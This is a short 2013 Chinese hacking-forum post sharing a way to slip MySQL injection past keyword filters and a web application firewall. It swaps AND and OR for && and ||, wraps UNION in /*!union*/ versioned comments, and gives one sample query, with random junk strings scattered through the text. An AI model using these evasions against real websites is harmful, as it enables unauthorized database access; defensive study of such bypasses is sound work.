找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1767|回复: 0
打印 上一主题 下一主题

mysql注入对and or的过滤及uinon select等过滤的一个方法突破

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 12:41:12 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
1.and 用&& 代替
+ b. N* F8 K9 y2 d- Y& G
) A. {- S6 k" f* P- s; s  S2. or 用||代替
' M: y- U7 P4 a1 A3 h' A- d0 d% q1 }6 H
3.union select from 变成 /*!union*/这种。# C. j3 a; O6 d& o  {! f- t  j" g3 @
" U2 D7 r4 D8 F+ C
一个例子:! M% ]' J& f1 E4 `

' w+ Y% y2 |' @4 d0 h/ select 1 /*!union*/ select 2 from adad where 1&&11 ~0 D+ F0 Q% A' e

1 N, }8 g8 W' b$ q摘自 it_security+ O: A6 V+ h& k6 j% f

( X4 \. |" n! G, U绕过waf的一个思路$ J0 K# R. p8 M! D1 v: a4 P
+ g. S  E4 Z, i) j
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表